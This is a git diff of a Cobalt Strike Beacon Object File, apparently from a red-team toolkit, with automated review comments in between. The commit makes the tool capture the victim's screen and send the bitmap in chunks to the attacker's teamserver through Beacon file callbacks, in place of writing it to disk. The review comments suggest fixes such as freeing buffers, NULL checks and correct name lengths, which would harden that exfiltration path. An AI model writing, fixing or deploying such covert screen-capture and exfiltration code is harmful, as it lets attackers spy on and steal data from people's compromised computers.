diff --git a/ScreenshotBOF/Source.cpp b/ScreenshotBOF/Source.cpp index 7c3f08e..ad212e0 100644 --- a/ScreenshotBOF/Source.cpp +++ b/ScreenshotBOF/Source.cpp 
@@ -5,7 +5,138 @@ #pragma comment(lib, "User32.lib") #pragma comment(lib, "Gdi32.lib") +char downloadfilename[] = "screenshot.bmp"; +/*Download File*/ +void downloadFile(char* fileName, int downloadFileNameLength, char* returnData, int fileSize) { + //Intializes random number generator to create fileId + time_t t; + MSVCRT$srand((unsigned)MSVCRT$time(&t)); + int fileId = MSVCRT$rand(); + + //8 bytes for fileId and fileSize + int messageLength = downloadFileNameLength + 8; + char* packedData = (char*)MSVCRT$malloc(messageLength); + + //pack on fileId as 4-byte int first + packedData[0] = (fileId >> 24) & 0xFF; + packedData[1] = (fileId >> 16) & 0xFF; + packedData[2] = (fileId >> 8) & 0xFF; + packedData[3] = fileId & 0xFF; + + //pack on fileSize as 4-byte int second + packedData[4] = (fileSize >> 24) & 0xFF; + packedData[5] = (fileSize >> 16) & 0xFF; + packedData[6] = (fileSize >> 8) & 0xFF; + packedData[7] = fileSize & 0xFF; + + int packedIndex = 8; + + //pack on the file name last + for (int i = 0; i < downloadFileNameLength; i++) { + packedData[packedIndex] = fileName[i]; + packedIndex++; + } + + BeaconOutput(CALLBACK_FILE, packedData, messageLength); + + if (fileSize > (1024 * 900)) { + + //Lets see how many times this constant goes into our file size, then add one (because if it doesn't go in at all, we still have one chunk) + int numOfChunks = (fileSize / (1024 * 900)) + 1; + int index = 0; + int chunkSize = 1024 * 900; + + while (index < fileSize) { + if (fileSize - index > chunkSize) {//We have plenty of room, grab the chunk and move on + + /*First 4 are the fileId + then account for length of file + then a byte for the good-measure null byte to be included + then lastly is the 4-byte int of the fileSize*/ + int chunkLength = 4 + chunkSize; + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); + + //pack on fileId as 4-byte int first + packedChunk[0] = (fileId >> 24) & 0xFF; + packedChunk[1] = (fileId >> 16) & 0xFF; + packedChunk[2] = (fileId >> 8) & 0xFF; 
+ packedChunk[3] = fileId & 0xFF; + + int chunkIndex = 4; + + //pack on the file name last + for (int i = index; i < index + chunkSize; i++) { + packedChunk[chunkIndex] = returnData[i]; + chunkIndex++; + } + + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); + + } + else {//This chunk is smaller than the chunkSize, so we have to be careful with our measurements + + int lastChunkLength = fileSize - index + 4; + char* lastChunk = (char*)MSVCRT$malloc(lastChunkLength); + + //pack on fileId as 4-byte int first + lastChunk[0] = (fileId >> 24) & 0xFF; + lastChunk[1] = (fileId >> 16) & 0xFF; + lastChunk[2] = (fileId >> 8) & 0xFF; + lastChunk[3] = fileId & 0xFF; + int lastChunkIndex = 4; + + //pack on the file name last + for (int i = index; i < fileSize; i++) { + lastChunk[lastChunkIndex] = returnData[i]; + lastChunkIndex++; + } + BeaconOutput(CALLBACK_FILE_WRITE, lastChunk, lastChunkLength); + } + + index = index + chunkSize; + + } + + } + else { + + /*first 4 are the fileId + then account for length of file + then a byte for the good-measure null byte to be included + then lastly is the 4-byte int of the fileSize*/ + int chunkLength = 4 + fileSize; + char* packedChunk = (char*)MSVCRT$malloc(chunkLength); + + //pack on fileId as 4-byte int first + packedChunk[0] = (fileId >> 24) & 0xFF; + packedChunk[1] = (fileId >> 16) & 0xFF; + packedChunk[2] = (fileId >> 8) & 0xFF; + packedChunk[3] = fileId & 0xFF; + int chunkIndex = 4; + + //pack on the file name last + for (int i = 0; i < fileSize; i++) { + packedChunk[chunkIndex] = returnData[i]; + chunkIndex++; + } + + BeaconOutput(CALLBACK_FILE_WRITE, packedChunk, chunkLength); + } + + + //We need to tell the teamserver that we are done writing to this fileId + char packedClose[4]; + + //pack on fileId as 4-byte int first + packedClose[0] = (fileId >> 24) & 0xFF; + packedClose[1] = (fileId >> 16) & 0xFF; + packedClose[2] = (fileId >> 8) & 0xFF; + packedClose[3] = fileId & 0xFF; + BeaconOutput(CALLBACK_FILE_CLOSE, 
packedClose, 4); + + return; +} #pragma region error_handling #define print_error(msg, hr) _print_error(__FUNCTION__, __LINE__, msg, hr) @@ -80,11 +211,10 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) ReleaseDC(NULL, hDC); } - fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, - FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); + //fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL); - if (fh == INVALID_HANDLE_VALUE) - return FALSE; + //if (fh == INVALID_HANDLE_VALUE) + // return FALSE; bmfHdr.bfType = 0x4D42; // "BM" dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize; 
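Review bot: Every buffer `downloadFile` obtains from `MSVCRT$malloc` — `packedData`, each per-iteration `packedChunk`, and `lastChunk` — is used without a NULL check and never released after the `BeaconOutput` call that consumes it, so one call leaks the whole bitmap in 900 KiB pieces inside a process that stays alive. Add `if (!packedData) { return; }` after each allocation and a matching `MSVCRT$free(packedData);` once `BeaconOutput` returns (a `free` import would have to be declared in bofdefs.h next to the `MSVCRT$malloc` one this commit adds; I cannot see whether one already exists). The unused `numOfChunks`, the file-scope `char downloadfilename[]` (shadowed by a local of the same name in `go`), and the comment block promising a "good-measure null byte" that the `4 + chunkSize` arithmetic does not reserve should all go. The big-endian packing of `fileId`/`fileSize` is copied out four times; a small `static` helper that writes one 32-bit value into a 4-byte slot would halve the function and remove the copy-paste risk.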
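Review bot: Commenting out `CreateFile` and its `INVALID_HANDLE_VALUE` check removes the only failure path `SaveHBITMAPToFile` had, so after this commit it returns TRUE no matter what happens further down, and it keeps two dead statements in the body. Delete the commented-out lines rather than carrying them (the `fh` and `dwWritten` locals declared above this hunk presumably become unused as well and will warn). Since nothing is written to `lpszFileName` any more, the function's header comment should say that the bitmap is handed to `downloadFile` and that the name is only reported, not opened. The function begins and ends outside this hunk.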
@@ -92,19 +222,28 @@ BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName) bmfHdr.bfReserved1 = 0; bmfHdr.bfReserved2 = 0; bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize; + void* bmpdata = malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize); + memcpy(bmpdata, &bmfHdr, sizeof(BITMAPFILEHEADER)); + memcpy(((char*)bmpdata) + sizeof(BITMAPFILEHEADER), lpbi, dwDIBSize); - WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL); - WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL); + downloadFile((char*)lpszFileName, sizeof(lpszFileName), (char*)bmpdata, (int)(sizeof(BITMAPFILEHEADER) + dwDIBSize)); + //WriteFile(fh, (LPSTR)bmpdata, sizeof(BITMAPFILEHEADER)+ dwDIBSize, &dwWritten, NULL); + + /* clean up */ GlobalUnlock(hDib); GlobalFree(hDib); - CloseHandle(fh); + //CloseHandle(fh); return TRUE; } #ifdef BOF void go(char* buff, int len) { - BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to disk"); + datap parser; + char * downloadfilename; + BeaconDataParse(&parser, buff, len); + downloadfilename = BeaconDataExtract(&parser, NULL); + BeaconPrintf(0x0, "[*] Tasked beacon to printscreen and save to %s",downloadfilename); int x1, y1, x2, y2, w, h; // get screen dimensions x1 = GetSystemMetrics(SM_XVIRTUALSCREEN); @@ -132,10 +271,10 @@ void go(char* buff, int len) { */ BeaconPrintf(0x0, "[+] PrintScreen saved to bitmap..."); - LPCSTR filename = "screenshot.bmp"; + LPCSTR filename = (LPCSTR)downloadfilename; SaveHBITMAPToFile(hBitmap, (LPCTSTR)filename); - BeaconPrintf(0x0, "[+] Printscreen bitmap saved to screenshot.bmp"); + //BeaconPrintf(0x0, "[+] Printscreen bitmap saved to %s",downloadfilename); // clean up SelectObject(hDC, old_obj); DeleteDC(hDC); diff --git a/ScreenshotBOF/beacon.h b/ScreenshotBOF/beacon.h index e70bebc..bfcf21f 100644 --- a/ScreenshotBOF/beacon.h +++ b/ScreenshotBOF/beacon.h 
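Review bot: `sizeof(lpszFileName)` in the new `downloadFile` call is the size of a pointer (4 on x86, 8 on x64), not the length of the name, so the CALLBACK_FILE message carries a truncated name and, for a name shorter than that, `downloadFile`'s copy loop reads past the terminator; pass the string's real length, computed with whatever CRT `strlen` import the project already declares (none is added in this commit). The `malloc(sizeof(BITMAPFILEHEADER) + dwDIBSize)` result is handed to `memcpy` without a NULL check, and `bmpdata` is never released once `downloadFile` returns, so each call leaks a buffer the size of the whole screenshot; add `if (!bmpdata) { GlobalUnlock(hDib); GlobalFree(hDib); return FALSE; }` after the allocation and free `bmpdata` before the `/* clean up */` block (which needs a `free` import like the `MSVCRT$malloc` one bofdefs.h gains here). The `(int)` cast on the total size wraps silently for a DIB over 2 GiB because `downloadFile` takes `int fileSize`; a one-line comment stating that assumption would do. The hunk also starts the new `go` body, which continues past it.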
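Review bot: `downloadfilename` is used here as the file name without ever being validated: it comes from `BeaconDataExtract(&parser, NULL)` in the previous hunk, which can return NULL when nothing was packed and otherwise a pointer to possibly empty data, so a task sent without an argument reaches `SaveHBITMAPToFile` and the `%s` `BeaconPrintf` with NULL. Add a guard right after the extract, `if (!downloadfilename || !*downloadfilename) { BeaconPrintf(CALLBACK_ERROR, "[-] no file name supplied"); return; }`, or fall back to the file-scope default — which would require renaming that global, since the local of the same name currently shadows it. The commented-out `BeaconPrintf` should either be restored (its `%s` form is correct) or removed rather than kept as dead code. `go` continues past this hunk.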
@@ -44,6 +44,9 @@ DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); #define CALLBACK_OUTPUT_OEM 0x1e #define CALLBACK_ERROR 0x0d #define CALLBACK_OUTPUT_UTF8 0x20 +#define CALLBACK_FILE 0x02 +#define CALLBACK_FILE_WRITE 0x08 +#define CALLBACK_FILE_CLOSE 0x09 DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); diff --git a/ScreenshotBOF/bofdefs.h b/ScreenshotBOF/bofdefs.h index c960e31..c0517b7 100644 --- a/ScreenshotBOF/bofdefs.h +++ b/ScreenshotBOF/bofdefs.h @@ -163,6 +163,7 @@ DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapAlloc(HANDLE hHeap, DWORD dwFlags, SI DECLSPEC_IMPORT BOOL WINAPI KERNEL32$HeapFree(HANDLE, DWORD, PVOID); DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$HeapReAlloc(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); DECLSPEC_IMPORT void* __cdecl MSVCRT$memcpy(LPVOID, LPVOID, size_t); +DECLSPEC_IMPORT void* __cdecl MSVCRT$malloc(size_t); DECLSPEC_IMPORT void __cdecl MSVCRT$memset(void*, int, size_t); @@ -266,6 +267,7 @@ DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBu #define HeapAlloc KERNEL32$HeapAlloc #define HeapReAlloc KERNEL32$HeapReAlloc #define memcpy MSVCRT$memcpy +#define malloc MSVCRT$malloc #define memset MSVCRT$memset diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log index a901931..dd08156 100644 --- a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log 
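Review bot: The three new CALLBACK_FILE* constants carry no description of the payload each one expects from `BeaconOutput`, which is currently only discoverable by reading `downloadFile` in Source.cpp. A one-line comment per define would keep the wire layout next to the value that selects it: for `CALLBACK_FILE`, `// 4-byte big-endian file id, 4-byte big-endian total size, then the file name`; for `CALLBACK_FILE_WRITE`, that the 4-byte id precedes each data chunk; for `CALLBACK_FILE_CLOSE`, that the body is the 4-byte id alone.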
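Review bot: The added `#define malloc MSVCRT$malloc` duplicates a `malloc` macro that bofdefs.h already defines at line 245 — the committed build logs in this same diff (both `ScreenshotBOF.log` files) report `warning C4005: 'malloc': macro redefinition` for exactly this line 270. If the earlier definition expands to the same thing, the new line is noise and should be dropped; if it expands to something else (a HeapAlloc-based wrapper, say), this hunk silently changes which allocator every later `malloc(...)` binds to, which deserves either a comment or a single surviving definition. The `MSVCRT$malloc` import added in the earlier bofdefs.h hunk (`@@ -163,6 +163,7 @@`) should be checked the same way against whatever sits next to the line-245 macro. Source.cpp's new `downloadFile` also calls `MSVCRT$srand`, `MSVCRT$time` and `MSVCRT$rand`, whose imports are not part of this change — presumably declared elsewhere in bofdefs.h, since the build log shows no error for them.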
@@ -13,8 +13,10 @@ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\Screens
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
-C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
 C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
+ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj
 1 File(s) copied
 enumerating sections...
diff --git a/ScreenshotBOF/intermediary/BOF/x64/source.obj b/ScreenshotBOF/intermediary/BOF/x64/source.obj
index 372bf0d..93a36b3 100644
Binary files a/ScreenshotBOF/intermediary/BOF/x64/source.obj and b/ScreenshotBOF/intermediary/BOF/x64/source.obj differ
diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log
index 032e56b..4909ac5 100644
--- a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log
+++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log
@@ -13,8 +13,10 @@ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\Screens
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once
-C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(247): warning C4005: 'ZeroMemory': macro redefinition
 C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory'
+C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(270): warning C4005: 'malloc': macro redefinition
+ C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(245): note: see previous definition of 'malloc'
 C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj
 1 File(s) copied
 enumerating sections...
diff --git a/ScreenshotBOF/intermediary/BOF/x86/source.obj b/ScreenshotBOF/intermediary/BOF/x86/source.obj
index e5c124d..247c80d 100644
Binary files a/ScreenshotBOF/intermediary/BOF/x86/source.obj and b/ScreenshotBOF/intermediary/BOF/x86/source.obj differ
diff --git a/bin/BOF/ScreenshotBOF.x64.obj b/bin/BOF/ScreenshotBOF.x64.obj
index c252446..c069e07 100644
Binary files a/bin/BOF/ScreenshotBOF.x64.obj and b/bin/BOF/ScreenshotBOF.x64.obj differ
diff --git a/bin/BOF/ScreenshotBOF.x86.obj b/bin/BOF/ScreenshotBOF.x86.obj
index 9619259..8b2d2fe 100644
Binary files a/bin/BOF/ScreenshotBOF.x86.obj and b/bin/BOF/ScreenshotBOF.x86.obj differ
diff --git a/bin/BOF/screenshotBOF.cna b/bin/BOF/screenshotBOF.cna
index 72d48df..3fcd237 100644
--- a/bin/BOF/screenshotBOF.cna
+++ b/bin/BOF/screenshotBOF.cna
@@ -11,11 +11,14 @@ alias screenshot_bof {
 # figure out the arch of this session
 $barch = barch($1);
 # read in the right BOF file
-$handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
+$handle = openf(script_resource("ScreenshotBOF. $+ $barch $+ .obj"));
 $data = readb($handle, -1);
 closef($handle);
+
+$args = bof_pack($1, "z",$2);
+
 # announce what we're doing
 btask($1, "Running screenshot BOF by (@codex_tf2)");
 # execute it.
 beacon_inline_execute($1, $data, "go", $args);
-}
\ No newline at end of file
+}
diff --git a/bin/screenshotBOF.zip b/bin/screenshotBOF.zip
index 5f6b839..47aff69 100644
Binary files a/bin/screenshotBOF.zip and b/bin/screenshotBOF.zip differ
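Review bot: `bof_pack($1, "z", $2)` packs the second alias argument without checking it was supplied, so `screenshot_bof` invoked with no name sends an empty "z" string and leaves the BOF side to cope with it. A guard before the pack, `if ($2 eq "") { $2 = "screenshot.bmp"; }`, keeps the default the previous version hard-coded, and the alias should document the new argument with a comment such as `# $2 = file name reported for the captured screenshot`. Worth noting that `$args` was already passed to `beacon_inline_execute` before this change without ever being assigned, so this hunk also fixes a latent bug that the commit does not call out.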